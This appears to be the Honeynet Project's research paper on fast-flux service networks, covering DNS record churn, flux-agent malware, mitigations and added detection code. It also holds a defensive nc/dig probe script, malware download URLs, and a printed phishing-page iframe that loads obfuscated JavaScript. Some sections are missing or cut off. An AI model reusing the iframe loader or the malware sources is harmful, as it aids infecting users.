An Ever Changing Enemy
Primary Authors: William Salusky, Robert Danford
Last Modified: 13 July, 2007
INTRODUCTION
One of the most active threats we face today on the Internet is cyber-crime. Increasingly capable criminals are constantly developing more sophisticated means of profiting from online criminal activity. This paper demonstrates a growing, sophisticated technique called fast-flux service networks which we are seeing increasingly used in the wild. Fast-flux service networks are networks of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations. In this paper we first provide an overview of what fast-flux service networks are, how they operate, and how the criminal community is leveraging them, including two types which we have designated single-flux and double-flux service networks. We then provide several examples of fast-flux service networks recently observed in the wild. Next we detail how fast-flux service network malware operates and present the results of research in which a honeypot was purposely infected with a fast-flux agent. Finally we cover how to detect, identify, and mitigate fast-flux service networks, primarily in large networking environments. At the end we supply five appendices providing additional information for those interested in digging into more technical detail.
SINGLE-FLUX NETWORKS
In Figure 1 below we demonstrate a single-flux network. We compare a normal web browser communicating directly with a typical website against the case of a single-flux service network, where the end user's browser communication is proxied via a redirector (the flux-bot or flux-agent). When a victim believes that they are browsing http://flux.example.com, their browser is actually communicating with a fast-flux service network redirector, which forwards the requests to the target website. Single-flux service networks change the DNS records for their front-end node IP addresses as often as every 3-10 minutes, so even if one flux-agent redirector node is shut down, many other infected redirector hosts are standing by and available to quickly take its place. We have found these fast-flux networks to be composed primarily of compromised home computers.
Fast-flux networks are responsible for many illegal practices, including online pharmacy shops, money mule recruitment sites, phishing websites, extreme/illegal adult content, malicious browser exploit websites, and the distribution of malware downloads. Beyond our regular observation of new DNS and HTTP services, other services such as SMTP, POP, and IMAP can be delivered via fast-flux service networks. Because fast-flux techniques utilize blind TCP and UDP redirects, any directional service protocol with a single target port would likely encounter few problems being served via a fast-flux service network.
On the left-hand side of the figure, we depict a single-flux lookup: the client wants to resolve the name flux.example.com. First, it asks a DNS root nameserver which nameserver is responsible for the top-level domain .com and receives an answer (omitted in the picture). In a second step, the client queries the .com nameserver for the domain example.com and receives as an answer a referral to the nameserver ns.example.com. Now the client can query the authoritative DNS server ns.example.com for the actual IP address of flux.example.com. The authoritative nameserver answers with an IP address with which the client can then attempt to initiate direct communication. For a normal DNS lookup, the answer IP address usually remains constant over a certain period of time, whereas for single-flux nodes the answer changes frequently.
On the right-hand side, we depict a DNS lookup for a name within a double-flux domain. Again, the client wants to look up flux.example.com, and again the first step (lookup at the root nameserver) is omitted for the sake of brevity. Next, the client queries the nameserver responsible for the top-level domain .com for the authoritative nameserver of the domain example.com. In a third step, the client then queries the authoritative DNS server ns.example.com for the address of flux.example.com. However, this authoritative nameserver is itself part of the double-flux scheme and its own IP address changes frequently. When a DNS request for flux.example.com is received from the client, the current authoritative nameserver forwards the query to the mothership node for the required information and relays the answer back. The client can then attempt to initiate direct communication with the target system (although this target system will itself be a dynamically changing front-end flux-agent node).
Single-flux nets appear to apply some form of logic in deciding which of their available IP addresses will be advertised in the next set of responses. This may be based on ongoing connection-quality monitoring (and perhaps a load-balancing algorithm). New flux-agent IP addresses are inserted into the fast-flux service network to replace nodes with poor performance, nodes subject to mitigation, or nodes that are otherwise offline. Now let's take a look at the DNS records of the domain divewithsharks.hk 30 minutes after the initial lookup and see what has changed:
;; WHEN: Sat Feb 3 20:40:04 2007 (~30 minutes/1800 seconds later)
divewithsharks.hk.   1800   IN  A   24.85.102.xxx    [xxx.vs.shawcable.net]  NEW
divewithsharks.hk.   1800   IN  A   69.47.177.xxx    [d4769xxx177.try.wideopenwest.com]  NEW
divewithsharks.hk.   1800   IN  A   70.68.187.xxx    [xxx.vf.shawcable.net]
divewithsharks.hk.   1800   IN  A   90.144.43.xxx    [d9014443xxx.cust.tele2.fr]
divewithsharks.hk.   1800   IN  A   142.165.41.xxx   [14216541xxx.msjw.hsdb.sasknet.sk.ca]
divewithsharks.hk.   1800   IN  NS  ns1.worldwr.com.
divewithsharks.hk.   1800   IN  NS  ns2.worldwr.com.
ns1.worldwr.com.     85248  IN  A   66.232.119.xxx   [HVCAS-HIVELOCITY VENTURES CORP]
ns2.worldwr.com.     82991  IN  A   209.88.199.xxx   [vpdndsl20988199xxx.alami.net]
As we see, the two advertised IP addresses marked NEW have changed. Again, these two IP addresses belong to dial-up or broadband networks. Another 30 minutes later, a lookup of the domain returns the following information:
;; WHEN: Sat Feb 3 21:10:07 2007 (~30 minutes/1800 seconds later)
divewithsharks.hk.   1238   IN  A   68.150.25.xxx    [xxx.ed.shawcable.net]  NEW
divewithsharks.hk.   1238   IN  A   76.209.81.xxx    [SBISAS-AT&T Internet Services]  This one came back!
divewithsharks.hk.   1238   IN  A   172.189.83.xxx   [xxx.ipt.aol.com]  NEW
divewithsharks.hk.   1238   IN  A   200.115.195.xxx  [pcxxx.telecentro.com.ar]  NEW
divewithsharks.hk.   1238   IN  A   213.85.179.xxx   [CNT Autonomous System]  NEW
divewithsharks.hk.   1238   IN  NS  ns1.worldwr.com.
divewithsharks.hk.   1238   IN  NS  ns2.worldwr.com.
ns1.worldwr.com.     83446  IN  A   66.232.119.xxx   [HVCAS-HIVELOCITY VENTURES CORP]
ns2.worldwr.com.     81189  IN  A   209.88.199.xxx   [vpdndsl20988199xxx.alami.net]
Now we observe four new IP addresses and one IP address that we saw in the first query. This demonstrates the round-robin address response mechanism used in fast-flux networks. As we have seen in this example, the A records for the domain are constantly changing. Each one of these systems represents a compromised host acting as a redirector, a redirector that eventually points to the money mule web site. A significant response issue is that incident responders do not know the ultimate destination of the money mule site unless they have access to one of the redirector nodes. This creates a far more dynamic and robust environment for the criminals. Next we will consider double-flux networks, where criminals add an additional layer of complexity to make their infrastructure harder to take down.
Double-Flux: MySpace
Double-flux is where both the NS records (authoritative name servers for the domain) and A records (web-serving host or hosts for the target) are regularly changed, making the fast-flux service network much more dynamic. For double-flux techniques to work, the domain registrar has to allow the domain administrator to frequently change the NS information, which is not something that usually occurs in normal domain management. In the example below, we observe a phishing attack directed against the popular social networking web site MySpace. The attacker has created a bogus website called login.mylspacee.com. This fake website appears visually to be the real MySpace web site, but instead harvests MySpace user authentication credentials from anyone who is tricked into logging in to the fake site. To make it harder for security professionals to shut down the fake site, both the NS and A DNS records are constantly changing. Observing DNS activity in such incidents, it is very common to detect a consistent pattern of five to ten A records in a set of round-robin responses, in addition to a five-NS-record round-robin response set, for any double-flux domain. This signature is becoming the hallmark for identifying double-flux domains. In the listing below, observe that these DNS records are constantly changing:
;; WHEN: Wed Apr 4 18:47:50 2007
login.mylspacee.com.        177     IN  A   66.229.133.xxx  [c66229133xxx.hsd1.fl.comcast.net]
login.mylspacee.com.        177     IN  A   67.10.117.xxx   [cpe6710117xxx.gt.res.rr.com]
login.mylspacee.com.        177     IN  A   70.244.2.xxx    [adsl702442xxx.dsl.hrlntx.swbell.net]
login.mylspacee.com.        177     IN  A   74.67.113.xxx   [cpe7467113xxx.stny.res.rr.com]
login.mylspacee.com.        177     IN  A   74.137.49.xxx   [7413749xxx.dhcp.insightbb.com]
mylspacee.com.              108877  IN  NS  ns3.myheroisyourslove.hk.
mylspacee.com.              108877  IN  NS  ns4.myheroisyourslove.hk.
mylspacee.com.              108877  IN  NS  ns5.myheroisyourslove.hk.
mylspacee.com.              108877  IN  NS  ns1.myheroisyourslove.hk.
mylspacee.com.              108877  IN  NS  ns2.myheroisyourslove.hk.
ns1.myheroisyourslove.hk.   854     IN  A   70.227.218.xxx  [ppp70227218xxx.dsl.sfldmi.ameritech.net]
ns2.myheroisyourslove.hk.   854     IN  A   70.136.16.xxx   [adsl7013616xxx.dsl.bumttx.sbcglobal.net]
ns3.myheroisyourslove.hk.   854     IN  A   68.59.76.xxx    [c685976xxx.hsd1.al.comcast.net]
ns4.myheroisyourslove.hk.   854     IN  A   70.126.19.xxx   [xxx19.12670.tampabay.res.rr.com]
ns5.myheroisyourslove.hk.   854     IN  A   70.121.157.xxx  [xxx.157.121.70.cfl.res.rr.com]
About four minutes later, for the same domain, only the A records have changed; the NS records have remained the same:
;; WHEN: Wed Apr 4 18:51:56 2007 (~4 minutes/186 seconds later)
login.mylspacee.com.   161  IN  A  74.131.218.xxx  [74131218xxx.dhcp.insightbb.com]  NEW
login.mylspacee.com.   161  IN  A  24.174.195.xxx  [cpe24174195xxx.elp.res.rr.com]  NEW
login.mylspacee.com.   161  IN  A  65.65.182.xxx   [adsl6565182xxx.dsl.hstntx.swbell.net]  NEW
login.mylspacee.com.   161  IN  A  69.215.174.xxx  [ppp69215174xxx.dsl.ipltin.ameritech.net]  NEW
login.mylspacee.com.   161  IN  A  71.135.180.xxx  [adsl71135180xxx.dsl.pltn13.pacbell.net]  NEW
Checking again about one and a half hours later, the NS records for this domain have migrated: the five NS names are unchanged, but each now resolves to a new address. As in the previous example, both the A and the NS records are hosted at dial-up or broadband providers, indicating that these are compromised hosts used by an attacker for nefarious purposes:
;; WHEN: Wed Apr 4 21:13:14 2007 (~90 minutes/4878 seconds later)
ns1.myheroisyourslove.hk.   3596  IN  A  75.67.15.xxx    [c756715xxx.hsd1.ma.comcast.net]  NEW
ns2.myheroisyourslove.hk.   3596  IN  A  75.22.239.xxx   [adsl7522239xxx.dsl.chcgil.sbcglobal.net]  NEW
ns3.myheroisyourslove.hk.   3596  IN  A  75.33.248.xxx   [adsl7533248xxx.dsl.chcgil.sbcglobal.net]  NEW
ns4.myheroisyourslove.hk.   180   IN  A  69.238.210.xxx  [ppp69238210xxx.dsl.irvnca.pacbell.net]  NEW
ns5.myheroisyourslove.hk.   3596  IN  A  70.64.222.xxx   [xxx.mj.shawcable.net]  NEW
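The traits visible in the listings above (low TTLs, A records that turn over almost completely between lookups and, for double-flux, NS hosts whose own addresses move and sit in consumer address space) can be scored mechanically. The following Python is an added example written for this page, not code from the paper or from the Honeynet Project: it parses answer lines in the same layout as the listings, compares successive snapshots of one name, and returns a single-flux, double-flux or not-flux verdict together with the evidence behind it. The sample snapshots are constructed from the sanitised records above, abbreviated to three A records each (the "xxx" octets are kept as literal tokens, so addresses compare as strings only); the control domain uses documentation addresses; and the RESIDENTIAL_HINTS list and the thresholds (a TTL of 1800 s or less, at least half of the A records new per lookup) are assumptions chosen for the example.

```python
"""Score successive DNS answers for the fast-flux traits described above."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One answer line in the "name TTL IN TYPE rdata [reverse name or AS]" layout
# of the listings above; trailing annotations such as NEW are ignored.
RECORD_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<rtype>A|NS)\s+(?P<rdata>\S+)"
    r"(?:\s+\[(?P<ptr>[^\]]*)\])?")

# Substrings typical of consumer access-network reverse names. Assumption:
# an illustrative list for this example, not an authoritative one.
RESIDENTIAL_HINTS = ("dsl", "cable", "ppp", "dhcp", "res.rr.com", "cust", "hsd1", "cpe")


@dataclass
class Snapshot:
    """One lookup: A records of the fluxed name and A records of its NS hosts."""
    a: dict = field(default_factory=dict)     # ip -> reverse name (fluxed name)
    ns_a: dict = field(default_factory=dict)  # ip -> reverse name (NS hosts)
    ttl: Optional[int] = None                 # lowest TTL seen on the fluxed name


def parse_snapshot(text, fluxed_name):
    snap = Snapshot()
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m or m["rtype"] == "NS":       # comments, blanks, NS name lines
            continue
        name, ip, ptr = m["name"].rstrip("."), m["rdata"].rstrip("."), m["ptr"] or ""
        if name == fluxed_name:
            snap.a[ip] = ptr
            snap.ttl = int(m["ttl"]) if snap.ttl is None else min(snap.ttl, int(m["ttl"]))
        else:                                 # an A record for one of the NS hosts
            snap.ns_a[ip] = ptr
    return snap


def residential_fraction(ptrs):
    ptrs = [p.lower() for p in ptrs if p]
    return sum(any(h in p for h in RESIDENTIAL_HINTS) for p in ptrs) / len(ptrs) if ptrs else 0.0


def classify(snapshots, max_ttl=1800, min_churn=0.5):
    """Return (verdict, evidence) for time-ordered snapshots of one name.
    Churn is the share of A records in a lookup that were absent from the
    previous lookup that carried A records. NS movement is flagged when the
    NS hosts' addresses seen over the whole series outnumber those of any
    single lookup, i.e. the name servers themselves are being fluxed."""
    with_a = [s for s in snapshots if s.a]
    churn = [len(set(cur.a) - set(prev.a)) / len(cur.a) for prev, cur in zip(with_a, with_a[1:])]
    all_ns_a = set().union(*(s.ns_a for s in snapshots))
    evidence = {
        "min_ttl": min(s.ttl for s in with_a) if with_a else None,
        "unique_a": len(set().union(*(s.a for s in snapshots))),
        "mean_churn": sum(churn) / len(churn) if churn else 0.0,
        "a_residential": residential_fraction(p for s in snapshots for p in s.a.values()),
        "ns_residential": residential_fraction(p for s in snapshots for p in s.ns_a.values()),
        "ns_moved": len(all_ns_a) > max(len(s.ns_a) for s in snapshots),
    }
    fluxing = (evidence["min_ttl"] is not None and evidence["min_ttl"] <= max_ttl
               and evidence["mean_churn"] >= min_churn)
    if not fluxing:
        return "not-flux", evidence
    return ("double-flux" if evidence["ns_moved"] else "single-flux"), evidence


# Sample snapshots, constructed for this example from the sanitised listings
# above (abbreviated); the control domain is invented.
SINGLE_FLUX = [parse_snapshot(t, "divewithsharks.hk") for t in (
    """divewithsharks.hk. 1800 IN A 24.85.102.xxx [xxx.vs.shawcable.net] NEW
    divewithsharks.hk. 1800 IN A 69.47.177.xxx [d4769xxx177.try.wideopenwest.com] NEW
    divewithsharks.hk. 1800 IN A 70.68.187.xxx [xxx.vf.shawcable.net]
    ns1.worldwr.com. 85248 IN A 66.232.119.xxx [HVCAS-HIVELOCITY VENTURES CORP]
    ns2.worldwr.com. 82991 IN A 209.88.199.xxx [vpdndsl20988199xxx.alami.net]""",
    """divewithsharks.hk. 1238 IN A 68.150.25.xxx [xxx.ed.shawcable.net] NEW
    divewithsharks.hk. 1238 IN A 172.189.83.xxx [xxx.ipt.aol.com] NEW
    divewithsharks.hk. 1238 IN A 200.115.195.xxx [pcxxx.telecentro.com.ar] NEW
    ns1.worldwr.com. 83446 IN A 66.232.119.xxx [HVCAS-HIVELOCITY VENTURES CORP]
    ns2.worldwr.com. 81189 IN A 209.88.199.xxx [vpdndsl20988199xxx.alami.net]""")]
DOUBLE_FLUX = [parse_snapshot(t, "login.mylspacee.com") for t in (
    """login.mylspacee.com. 177 IN A 66.229.133.xxx [c66229133xxx.hsd1.fl.comcast.net]
    login.mylspacee.com. 177 IN A 67.10.117.xxx [cpe6710117xxx.gt.res.rr.com]
    login.mylspacee.com. 177 IN A 70.244.2.xxx [adsl702442xxx.dsl.hrlntx.swbell.net]
    mylspacee.com. 108877 IN NS ns1.myheroisyourslove.hk.
    ns1.myheroisyourslove.hk. 854 IN A 70.227.218.xxx [ppp70227218xxx.dsl.sfldmi.ameritech.net]
    ns2.myheroisyourslove.hk. 854 IN A 70.136.16.xxx [adsl7013616xxx.dsl.bumttx.sbcglobal.net]""",
    """login.mylspacee.com. 161 IN A 74.131.218.xxx [74131218xxx.dhcp.insightbb.com] NEW
    login.mylspacee.com. 161 IN A 24.174.195.xxx [cpe24174195xxx.elp.res.rr.com] NEW
    login.mylspacee.com. 161 IN A 65.65.182.xxx [adsl6565182xxx.dsl.hstntx.swbell.net] NEW""",
    """ns1.myheroisyourslove.hk. 3596 IN A 75.67.15.xxx [c756715xxx.hsd1.ma.comcast.net] NEW
    ns2.myheroisyourslove.hk. 3596 IN A 75.22.239.xxx [adsl7522239xxx.dsl.chcgil.sbcglobal.net] NEW""")]
CONTROL = [parse_snapshot(t, "www.example.com") for t in (
    "www.example.com. 3600 IN A 192.0.2.10\nns.example.com. 86400 IN A 192.0.2.53",) * 2]
```

Calling classify(SINGLE_FLUX) gives "single-flux" (every A record is new after 30 minutes but the two NS hosts never move), classify(DOUBLE_FLUX) gives "double-flux" (the NS hosts' addresses change as well), and classify(CONTROL) gives "not-flux". The residential fractions are reported as evidence rather than used in the verdict because reverse-DNS naming is suggestive, not conclusive; an analyst will still want to check the AS of each address.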
FAST-FLUX MALWARE
Flux-agent nodes share the most essential and basic capabilities of the traditional, minimalist IRC-based bot: they regularly phone home to announce their continued availability, check for updates, perform download operations, and allow a remote attacker to execute arbitrary commands on the local operating system. However, almost without exception, fast-flux command and control (C&C) activity observed in the wild thus far has been HTTP based. The ability of fast-flux agents to proxy or redirect TCP services appears to be an outgrowth of the redirect functions of legacy IRC bots, some of which also possess optional UDP proxy or redirect capabilities. The bundling of these features makes a fast-flux service network a powerful criminal tool and makes its operator less easily detectable. The fast-flux front-end nodes either act on command or execute hard-coded instructions to redirect inbound traffic received on configured ports to a specifically chosen upstream fast-flux mothership node. Several fast-flux service network operations have been observed maintaining distributed nodes whose primary role is performing availability and connection-quality tests of individual flux-agents within the network. For an example of the development cycle of fast-flux malware, refer to Appendix A. For an example of the infection process for the malware, refer to Appendix B. Below we summarize two commonly used malware families that have adopted fast-flux capabilities.
Warezov/Stration: The networks based upon these malware variants have been erected to provide a robust platform for sending large volumes of unsolicited email (spam). They have been very successful in this goal and employ advanced techniques such as the constant automated creation of many malware variants to frustrate anti-virus signature creation. Infected machines download these updates on a regular schedule in order to increase the amount of time it takes for a system to be cleaned and taken offline. These updates must be hosted on websites, so if their public IP addresses remain static, the update sites can potentially be taken down fairly easily. Until recently, a strategy of auto-generating pseudo-random domain names which moved around was used to protect such download sites. Starting in May 2007, the criminal organization behind this spam business moved to a fast-flux service network model. This group is now hosting its DNS services and malware download sites via fast-flux service networks and appears to be enjoying continued success in its criminal endeavor.
Storm: The biggest competitor of the Warezov/Stration gang is perhaps the criminal organization operating a very large spam-sending network based on the family of malware variants dubbed Storm/Peacomm/Peed. They employ a UDP-based P2P model for botnet command and control. This is a highly robust way to operate a large distributed network if the complexities of managing peer lists and minimizing latency can be overcome. They have also employed novel techniques to counter anti-spam solutions, such as generating image-based spam on the fly on the endpoint flux-agent nodes themselves, rather than simply relying on template-based messaging. These images are randomized in ways which frustrate the OCR (optical character recognition) technologies used in some anti-spam products, and have been most commonly used to facilitate fraudulent pump-and-dump stock spam schemes. In June 2007 this group was observed attempting to modify its P2P network to support fast-flux style networking. This is a significant advance for spam-sending malware and requires further study.
3. The fast-flux registration server (mothership) responds to the announcement/registration step with "Added Successfully!". We take this to mean that the infected system has been successfully added to the fast-flux service network: a new victim is standing by for malicious duty.
4. The next step is for the infected system to obtain a configuration file by hourly polling of a settings file on a remote web server. This is where the flux-agent learns details including which ports to bind, where the mothership is located, and which incoming traffic will be redirected upstream to the mothership. In this case, the fast-flux agent submits an HTTP GET request to another virtual web host that only happens to share the same IP as the registration interface:
http://xxx.iconnectyou.biz/settings/weby/settings.ini
The server responds with what appears to be a consistent 197-byte binary/encoded configuration response. We are still attempting to reverse engineer the complete details of this session. For the full packet payload of the binary/encoded configuration response, please refer to Appendix D.
5. Finally the system downloads a suspiciously named DLL, plugin_ddos.dll, whose name might suggest that it is a denial-of-service component. For more information on this session, refer to Appendix E.
STATISTICS
To give you a better feel for the scope of fast-flux service networks and how many systems are typically involved, below we provide statistics about one specific fast-flux service network. This example was involved in the delivery of a PharmaShop scam. Key points include:
* We collected data from 03 February 2007 to 11 February 2007.
* The domain itself, greatfriedrice.info, was created January 02, 2007 at 15:11 and was terminated February 13, 2007 at 04:26 EST.
* To gather our information we queried DNS every 2 minutes and then collected information on the IP addresses assigned to the domain name and how those IP addresses (A and NS records) changed over time.
* A total of 3,241 unique IP addresses were utilized in this fast-flux service network during the study.
* Of these unique IP addresses, 1,516 were advertised as authoritative NS records and 2,844 were short-lived-TTL A record round robins used for HTTP proxy/redirect (the two figures sum to more than the total, so some addresses served in both roles).
* 256 different Autonomous Systems (ASs) were represented in the infection base: 181 ASs served fluxDNS and 241 ASs served fluxHTTP redirection. This may be an indicator of provider policies regarding inbound blocking of either UDP 53 or TCP 80 into subscriber populations.
Below are tables highlighting the ASs that had the most infected systems as part of the fast-flux service network. This example was chosen because it was monitored at the highest resolution (every 2 minutes). To date over 80,000 flux IPs have been logged, with over 1.2 million unique mappings.
AS Breakdown for DNS Flux Networks
Total#  AS#
331     7132 (SBC/ATT)
300     1668 (AOL)
47      11427 (RR)
40      33287
35      11426
28      3356
27      33491
27      20115
25      7015
25      13343
AS Breakdown for HTTP Flux Networks
Total#  AS#
668     7132 (SBC/ATT)
662     1668 (AOL)
75      3356
73      11427
51      33287
46      33491
40      20115
39      11426
37      7015
36      11351
The following simple shell script injects the Base64-encoded string "helloflux" (aGVsbG9mbHV4IAo) twice: once as the payload of an HTTP request and once as the label of a DNS query, both directed at the suspected flux node. With Snort signatures that match on that string, we can then trace the path of the marker through the network as the suspect node forwards it upstream.
$ cat fluxtest.sh
#!/bin/bash
# Simple shell script to test
# suspected flux nodes on your managed networks
# Usage: ./fluxtest.sh <suspect-ip>
# The marker is sent once as an HTTP payload and once as a DNS query label;
# a flux-agent blindly forwards both upstream, so a sensor watching for the
# marker sees it leave the suspect host toward the mothership.
echo "aGVsbG9mbHV4IAo" | nc -w 1 "${1}" 80
dig +time=1 aGVsbG9mbHV4IAo.dns.com @"${1}"
If a service provider lacks IDS capability in the subscriber space but can report on NetFlow, flow data can also be used to detect fast-flux service networks. This is not as good as the IDS-based detection method presented above, but looking for inbound TCP 80 and/or UDP 53 into subscriber IP space is a start: dynamically addressed subscriber hosts should normally not be serving HTTP or DNS to the Internet, so such traffic is a sign of a possible flux-agent. The following listing provides some further ideas to stop this kind of threat. In brackets, we list which party could implement each mitigation policy:
1. Establish policies to enable blocking of TCP 80 and UDP 53 into subscriber networks if possible. (ISP)
2. Block access to controller infrastructure (motherships, registration, and availability checkers) as they are discovered. (ISP)
3. Improve domain registrar response procedures, and audit new registrations for likely fraudulent purpose. (Registrar)
4. Increase service provider awareness; foster understanding of the threat, shared processes and knowledge. (ISP)
5. Blackhole DNS and BGP route injection to kill related motherships and management infrastructure. (ISP)
6. Passive DNS harvesting/monitoring to identify A or NS records advertised into publicly routable subscriber IP space. (ISPs, registrars, security professionals, ...)
This is just a very brief overview of how fast-flux service networks can be mitigated, and further research is required in this subject area.
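The NetFlow heuristic just described, as an added example for this page and not code from the paper: given flow records, it lists subscriber hosts that accept TCP/80 or UDP/53 from several distinct outside sources. The flow records, the 198.51.100.0/24 subscriber pool (a documentation range standing in for real customer space) and the thresholds are all constructed for the example. One caveat a practitioner hits immediately is that inbound TCP/80 into any subscriber pool is dominated by scanning, so the example only counts TCP flows that carried more than a handshake's worth of packets; UDP has no handshake to lean on, so there the distinct-source threshold carries the burden alone.

```python
"""Flux-agent candidates from NetFlow-style records."""
import ipaddress
from collections import defaultdict

# The provider's dynamically assigned subscriber pool (constructed: a
# documentation range standing in for real customer space).
SUBSCRIBER_SPACE = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed sample flows: (src_ip, dst_ip, proto, dst_port, packets).
# 203.0.113.0/24 and 192.0.2.0/24 play the rest of the Internet.
FLOWS = [
    # .17 completes HTTP sessions from unrelated outside clients: flux-agent behaviour
    ("203.0.113.5", "198.51.100.17", "tcp", 80, 9),
    ("203.0.113.77", "198.51.100.17", "tcp", 80, 12),
    ("192.0.2.30", "198.51.100.17", "tcp", 80, 7),
    ("192.0.2.31", "198.51.100.17", "tcp", 80, 15),
    # .23 answers DNS queries from outside resolvers
    ("203.0.113.9", "198.51.100.23", "udp", 53, 2),
    ("203.0.113.10", "198.51.100.23", "udp", 53, 1),
    ("192.0.2.40", "198.51.100.23", "udp", 53, 3),
    # .40 is merely being port-scanned: single-packet SYNs, never a session
    *[(f"203.0.113.{n}", "198.51.100.40", "tcp", 80, 1) for n in range(100, 110)],
    # .55 is browsing: the subscriber is the source, so this is not inbound service
    ("198.51.100.55", "203.0.113.200", "tcp", 80, 20),
    # outside-to-outside traffic is out of scope
    ("192.0.2.1", "203.0.113.2", "tcp", 80, 30),
]

WATCHED = {("tcp", 80), ("udp", 53)}


def in_space(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def flux_candidates(flows, subscriber_space, min_sources=3, min_tcp_packets=3):
    """Map dst_ip -> {(proto, port): number of distinct outside sources} for
    subscriber hosts that serve HTTP or DNS inbound. TCP flows shorter than
    min_tcp_packets are discarded so that SYN scans do not count as served
    connections."""
    sources = defaultdict(lambda: defaultdict(set))
    for src, dst, proto, port, packets in flows:
        key = (proto, port)
        if key not in WATCHED or (proto == "tcp" and packets < min_tcp_packets):
            continue
        if in_space(src, subscriber_space) or not in_space(dst, subscriber_space):
            continue                          # only outside-to-subscriber counts
        sources[dst][key].add(src)
    return {dst: {key: len(srcs) for key, srcs in per.items() if len(srcs) >= min_sources}
            for dst, per in sources.items()
            if any(len(srcs) >= min_sources for srcs in per.values())}


if __name__ == "__main__":
    for host, services in flux_candidates(FLOWS, SUBSCRIBER_SPACE).items():
        print(host, services)
```

On the sample flows this reports 198.51.100.17 (four HTTP sources) and 198.51.100.23 (three DNS sources) and nothing else: the scanned host never completes a session, the browsing host is a client, not a server, and outside-to-outside flows are ignored. In production the thresholds should be tuned against the pool's baseline, since a subscriber legitimately running a small web server will also match.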
SUMMARY
Fast-flux service networks demonstrate an evolutionary step for online crime operations. They create robust, obfuscating service delivery infrastructures that make it difficult for system administrators and law enforcement agents to shut down active scams and identify the criminals operating them. The robustness, obfuscation capabilities, scalability and increased availability of fast-flux service networks produce an increased return on investment (ROI) for the criminals who operate them. Just as in legitimate business, the Internet represents a huge economic opportunity for online crime, which unfortunately means that we can expect techniques such as fast-flux service networks to continue to evolve. Emerging threats such as fast-flux service networks are often a step ahead of security professionals, and it looks likely that this particular arms race will continue into the foreseeable future.
ACKNOWLEDGEMENTS
A paper of this complexity requires the input and cooperation of many people and organizations. In particular the Honeynet Project would like to thank the following people:
* The SANS Internet Storm Center
* Multiple service provider networks
* David Watson of the UK Honeynet Project (reviewer)
* Thorsten Holz of the German Honeynet Project (reviewer)
* Fyodor of the Honeynet Project (reviewer)
* David Dittrich of the Honeynet Project (reviewer)
* Jamie Riden of the UK Honeynet Project (reviewer)
* Earl Sammons of the Honeynet Project (reviewer)
* Georg Wicherski of the German Honeynet Project (reviewer)
* Nico Fischbach of the French Honeynet Project (reviewer)
* Christian Seifert of the NZ Honeynet Project (reviewer)
* Christine Kilger (design artist)
APPENDICES
Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 50176 Bytes
Access: 2007-03-15 02:09:03.000000000 -0400
Modify: 2007-03-09 10:51:26.000000000 -0500
Change: 2007-03-15 02:09:03.000000000 -0400
MD5: 70978572bc5c4fecb9d759611b27a762
SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 http://xxx.myexes.hk/exes/webdlx/weby.exe

Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 9728 Bytes
Access: 2007-04-02 15:39:05.000000000 -0400
Modify: 2007-03-09 23:48:17.000000000 -0500
Change: 2007-04-02 15:39:06.000000000 -0400
MD5: 5870fd7119a91323dbdf04ebd07d0ac7
SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 http://65.111.176.xxx/weby/plugin_ddos.dll

Previous incarnation:
Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe
File type(s): MS-DOS executable (EXE)
Size: 29557 Bytes
Access: 2007-02-06 15:26:03.000000000 -0500
Modify: 2007-02-02 08:47:24.000000000 -0500
Change: 2007-02-06 15:26:03.000000000 -0500
MD5: e903534fab14ee7e00c279d64f578cbb
SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe

Even older sample:
Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe
File type(s): MS-DOS executable (EXE)
Size: 29425 Bytes
Access: 2007-01-20 16:29:06.000000000 -0500
Modify: 2007-01-20 05:39:22.000000000 -0500
Change: 2007-01-20 16:29:06.000000000 -0500
MD5: 88b58b62ae43f0fa42e852874aefbd01
SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe

A prehistoric sample of flux-agent code (according to Internet time). We first observed nodes infected with this malware in the middle of 2006, but only acquired a malware sample for analysis in November 2006:
Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 11264 Bytes
Access: 2006-11-14 06:39:03.000000000 -0500
Modify: 2006-11-14 06:29:14.000000000 -0500
Change: 2006-11-14 06:39:03.000000000 -0500
MD5: d134894005c299c1c01e63d9012a12c6
SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE
By following the above /da3e/index.php link, we end up going to a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:
<!-- onRequestEnd --><script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>
The iframe rendered /.footer_01.gif , which is not an actual gif file, but instead an encoded/obfuscated JavaScript snippet. Below we can see the obfuscated JavaScript code it feeds us.
